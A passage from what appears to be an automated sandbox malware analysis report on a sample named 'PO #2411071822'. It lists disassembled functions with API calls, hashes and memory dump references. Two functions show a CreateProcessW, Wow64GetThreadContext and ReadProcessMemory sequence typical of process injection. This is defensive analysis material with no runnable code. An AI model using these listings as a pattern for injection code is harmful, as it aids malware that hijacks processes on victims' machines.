                                                                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                              • String ID: X$t3I
                                                                                                              • API String ID: 3777226403-1233262582
                                                                                                              • Opcode ID: 1928d50ce760156a300c65640c0deebb1ff0e47c81f1eb265d2e3d8d77fb03a8
                                                                                                              • Instruction ID: e05fcf1bd3d5ca0409f883c139f47d44a62b45f04af68994d352450a80f32270
                                                                                                              • Opcode Fuzzy Hash: 1928d50ce760156a300c65640c0deebb1ff0e47c81f1eb265d2e3d8d77fb03a8
                                                                                                              • Instruction Fuzzy Hash: 5921A871A101989FCF12DFD5C8457DEBBFC9F59305F00806AE405BB281DBB85A898F65
                                                                                                              Function 004034AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getstream.LIBCMT ref: 004034FE
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00403539
                                                                                                              • __wopenfile.LIBCMT ref: 00403549
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                              • String ID: <G
                                                                                                              • API String ID: 1820251861-2138716496
                                                                                                              • Opcode ID: 6b0d09551894233ee89a4a03cd0dfaa1efab98ee1259bbae01a9a6b1c5346864
                                                                                                              • Instruction ID: cd341fc58a287b5cc306137432472ec8f93a1700eff075165262910b85afd943
                                                                                                              • Opcode Fuzzy Hash: 6b0d09551894233ee89a4a03cd0dfaa1efab98ee1259bbae01a9a6b1c5346864
                                                                                                              • Instruction Fuzzy Hash: FD112E70D00205AADB11BF728C0166F3AA85F45354B15893BE415FB2C1EB3CCA1197A9
                                                                                                              Function 003FD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003FD28B,SwapMouseButtons,00000004,?), ref: 003FD2BC
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003FD28B,SwapMouseButtons,00000004,?,?,?,?,003FC865), ref: 003FD2DD
                                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,003FD28B,SwapMouseButtons,00000004,?,?,?,?,003FC865), ref: 003FD2FF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID: Control Panel\Mouse
                                                                                                              • API String ID: 3677997916-824357125
                                                                                                              • Opcode ID: 6d15d9b52747a2452b25f11cb15572c1b29b52d31fed3f5bd0ae833912fa6563
                                                                                                              • Instruction ID: a10bc0a03254713dad21ba604cd7983813ae03da0977f8bcdd93f5c86438ab51
                                                                                                              • Opcode Fuzzy Hash: 6d15d9b52747a2452b25f11cb15572c1b29b52d31fed3f5bd0ae833912fa6563
                                                                                                              • Instruction Fuzzy Hash: 6E115A75A1120CBFDB128F64DC88EBE7BBDEF04744B00482AEA01D7120E7719E409B65
                                                                                                              Function 00D77240 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D779FB
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D77A91
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D77AB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 2438371351-0
                                                                                                              • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                              • Instruction ID: dd2ae358a27502cc787b5391b8fd973b055a4e7e717797fb12f3231e00252c6d
                                                                                                              • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                              • Instruction Fuzzy Hash: 11620D30A14258DBEB24CFA4C854BEEB376EF58300F1095A9D10DEB394E7759E81CB69
                                                                                                              Function 0042C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0042C72F
                                                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0042C746
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Temp$FileNamePath
                                                                                                              • String ID: aut
                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                              • Opcode ID: 60abdce62debf714a0dd6f3d51e30a53bbf5f5e9cd08ccbee66f56efc243d6c9
                                                                                                              • Instruction ID: d70513faba09993ee579aa79c47b9e094165b1c200ce196d4e12b9a366ebc0bc
                                                                                                              • Opcode Fuzzy Hash: 60abdce62debf714a0dd6f3d51e30a53bbf5f5e9cd08ccbee66f56efc243d6c9
                                                                                                              • Instruction Fuzzy Hash: 6DD05E71A0030EABDB10AB90DC0EF8A7B6C9704704F0001B1B650E50B1EAF5E6998B5A
                                                                                                              Function 0043F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 49cdc46257089f5e4d224cc9bc162724af15a66a356ab820b14e3bb0813984fe
                                                                                                              • Instruction ID: c84526dd029764b8d6aa4f6639ec2c872d8abba8cf43180fda7f961f14dbd7fa
                                                                                                              • Opcode Fuzzy Hash: 49cdc46257089f5e4d224cc9bc162724af15a66a356ab820b14e3bb0813984fe
                                                                                                              • Instruction Fuzzy Hash: FCF16971A043019FC710DF24C985B6EB7E5BF88314F14892EF9999B392D774E909CB86
                                                                                                              Function 0040395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00403973
                                                                                                                • Part of subcall function 004081C2: __NMSG_WRITE.LIBCMT ref: 004081E9
                                                                                                                • Part of subcall function 004081C2: __NMSG_WRITE.LIBCMT ref: 004081F3
                                                                                                              • __NMSG_WRITE.LIBCMT ref: 0040397A
                                                                                                                • Part of subcall function 0040821F: GetModuleFileNameW.KERNEL32(00000000,004A0312,00000104,00000000,00000001,00000000), ref: 004082B1
                                                                                                                • Part of subcall function 0040821F: ___crtMessageBoxW.LIBCMT ref: 0040835F
                                                                                                                • Part of subcall function 00401145: ___crtCorExitProcess.LIBCMT ref: 0040114B
                                                                                                                • Part of subcall function 00401145: ExitProcess.KERNEL32 ref: 00401154
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • RtlAllocateHeap.NTDLL(00D30000,00000000,00000001,00000001,00000000,?,?,003FF507,?,0000000E), ref: 0040399F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                              • String ID:
                                                                                                              • API String ID: 1372826849-0
                                                                                                              • Opcode ID: 9e9f11207ad7bbc2993c24804fd7d2ac619d3f7185017fa76103dbff1c2dfb80
                                                                                                              • Instruction ID: 45af2be7207b0bb9dfc2f03544719083443ff21f8ea0a3eab6c272d6eb840835
                                                                                                              • Opcode Fuzzy Hash: 9e9f11207ad7bbc2993c24804fd7d2ac619d3f7185017fa76103dbff1c2dfb80
                                                                                                              • Instruction Fuzzy Hash: 6601D6B13452019AE6113F2ADC42A6B3B4C9B82729B20003FF501BB2E1DEBC9D0046AE
                                                                                                              Function 0042C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0042C385,?,?,?,?,?,00000004), ref: 0042C6F2
                                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0042C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0042C708
                                                                                                              • CloseHandle.KERNEL32(00000000,?,0042C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0042C70F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 3397143404-0
                                                                                                              • Opcode ID: 80a140fa3dc6c7d8cec565e0706f376c321a14e6cde1ede13e6077858fc58705
                                                                                                              • Instruction ID: d93441f51cf762dcbbe7fc0022cc2a00aa564a7faf1ab76c7d8a6414a9d2a406
                                                                                                              • Opcode Fuzzy Hash: 80a140fa3dc6c7d8cec565e0706f376c321a14e6cde1ede13e6077858fc58705
                                                                                                              • Instruction Fuzzy Hash: 1BE08632B40224B7D7211B54AC09FCE7B18AB05760F104120FB14691E0A7F12551879D
                                                                                                              Function 0042BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 0042BB72
                                                                                                                • Part of subcall function 00401C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00407A85), ref: 00401CB1
                                                                                                                • Part of subcall function 00401C9D: GetLastError.KERNEL32(00000000,?,00407A85), ref: 00401CC3
                                                                                                              • _free.LIBCMT ref: 0042BB83
                                                                                                              • _free.LIBCMT ref: 0042BB95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                              • Instruction ID: 58746f1591c22285b6aad3be7597ad271b14a742b0c0c4589d5891f152589de3
                                                                                                              • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                                                                              • Instruction Fuzzy Hash: 06E012A174575146EA2469BA7E4CEB317CC8F04355754082FB55AF7686CF3CF84089EC
                                                                                                              Function 003E2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 003E22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003E24F1), ref: 003E2303
                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003E25A1
                                                                                                              • CoInitialize.OLE32(00000000), ref: 003E2618
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0045503A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 3815369404-0
                                                                                                              • Opcode ID: 2382315e729026b09cec248df13ce1e5b9aabe594c963570d9eaef943c6087d7
                                                                                                              • Instruction ID: 34190eded79d97b8f168eeb7659ac2cb2eade92ae147bb28e2d15446293b1bc8
                                                                                                              • Opcode Fuzzy Hash: 2382315e729026b09cec248df13ce1e5b9aabe594c963570d9eaef943c6087d7
                                                                                                              • Instruction Fuzzy Hash: 2771D4BA9012919FD705EF5AA990695BFA4F79B340F8082BED519EB3B1D7748800CF1C
                                                                                                              Function 003E3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsThemeActive.UXTHEME ref: 003E3A73
                                                                                                                • Part of subcall function 00401405: __lock.LIBCMT ref: 0040140B
                                                                                                                • Part of subcall function 003E3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003E3AF3
                                                                                                                • Part of subcall function 003E3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003E3B08
                                                                                                                • Part of subcall function 003E3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,003E3AA3,?), ref: 003E3D45
                                                                                                                • Part of subcall function 003E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,003E3AA3,?), ref: 003E3D57
                                                                                                                • Part of subcall function 003E3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,004A1148,004A1130,?,?,?,?,003E3AA3,?), ref: 003E3DC8
                                                                                                                • Part of subcall function 003E3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,003E3AA3,?), ref: 003E3E48
                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003E3AB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 924797094-0
                                                                                                              • Opcode ID: 6ce3e184ae517c1377692eddf3d56ed71f3149b51c52a5d002d3dd99cef78604
                                                                                                              • Instruction ID: b85eba7d3733bbb382779666082fbb9a5f2af287d13be6aa5ba02873db484c80
                                                                                                              • Opcode Fuzzy Hash: 6ce3e184ae517c1377692eddf3d56ed71f3149b51c52a5d002d3dd99cef78604
                                                                                                              • Instruction Fuzzy Hash: D1119D71908351DBC301EF6AEC4591ABFE8EF95750F008A2FF584872B1DBB09585CB9A
                                                                                                              Function 0040E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___lock_fhandle.LIBCMT ref: 0040EA29
                                                                                                              • __close_nolock.LIBCMT ref: 0040EA42
                                                                                                                • Part of subcall function 00407BDA: __getptd_noexit.LIBCMT ref: 00407BDA
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                              • String ID:
                                                                                                              • API String ID: 1046115767-0
                                                                                                              • Opcode ID: a193515b83d9b02ea0f93879054cbd795456e41df097b1a78c01b7f4187bfee6
                                                                                                              • Instruction ID: ac2a1f850a5ad5faafef0b31853e9ab0b4bd3e82dcd0933edbcd3dfe67049cd1
                                                                                                              • Opcode Fuzzy Hash: a193515b83d9b02ea0f93879054cbd795456e41df097b1a78c01b7f4187bfee6
                                                                                                              • Instruction Fuzzy Hash: 7A112C72A056108AD711BF66C8417197E606F86339F164B77E4603F1E2C7BC5C109EAE
                                                                                                              Function 003FF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040395C: __FF_MSGBANNER.LIBCMT ref: 00403973
                                                                                                                • Part of subcall function 0040395C: __NMSG_WRITE.LIBCMT ref: 0040397A
                                                                                                                • Part of subcall function 0040395C: RtlAllocateHeap.NTDLL(00D30000,00000000,00000001,00000001,00000000,?,?,003FF507,?,0000000E), ref: 0040399F
                                                                                                              • std::exception::exception.LIBCMT ref: 003FF51E
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 003FF533
                                                                                                                • Part of subcall function 00406805: RaiseException.KERNEL32(?,?,0000000E,00496A30,?,?,?,003FF538,0000000E,00496A30,?,00000001), ref: 00406856
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 3902256705-0
                                                                                                              • Opcode ID: 24a19a4aa3a3b22163f95439750b78281c4feb11fd4d86d95a829d529af27245
                                                                                                              • Instruction ID: 37dc7b3730d8fa3096b332887c46b204f3f1d4fbb1702ce0afa7dc0407484d70
                                                                                                              • Opcode Fuzzy Hash: 24a19a4aa3a3b22163f95439750b78281c4feb11fd4d86d95a829d529af27245
                                                                                                              • Instruction Fuzzy Hash: 18F0A43150421E6BDB05BF9AD8019FE7BAC9F01358F65843BFE09A21D1DBB4964086AD
                                                                                                              Function 004035E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              • __lock_file.LIBCMT ref: 00403629
                                                                                                                • Part of subcall function 00404E1C: __lock.LIBCMT ref: 00404E3F
                                                                                                              • __fclose_nolock.LIBCMT ref: 00403634
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                              • String ID:
                                                                                                              • API String ID: 2800547568-0
                                                                                                              • Opcode ID: 949ae337a3f482bc01a62931c906ac45857c550809e5657e494b08e8a10fda4a
                                                                                                              • Instruction ID: de50bd512800288adb5e74f1436d4282a5122435bfb9130f6bab592cc6b73c7e
                                                                                                              • Opcode Fuzzy Hash: 949ae337a3f482bc01a62931c906ac45857c550809e5657e494b08e8a10fda4a
                                                                                                              • Instruction Fuzzy Hash: C4F0F671800200AAD721BF66880275E7EA45F80339F26853FE411BB2D1CB7C8A019E9D
                                                                                                              Function 00D7723D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D779FB
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D77A91
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D77AB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 2438371351-0
                                                                                                              • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                              • Instruction ID: a9817af9226864ade3554cf97360668224f4fae34f9eb488f9bde8c32769f62f
                                                                                                              • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                              • Instruction Fuzzy Hash: 5412CF24E18658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                                              Function 00402957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __flush.LIBCMT ref: 00402A0B
                                                                                                                • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
                                                                                                              Memory Dump Source
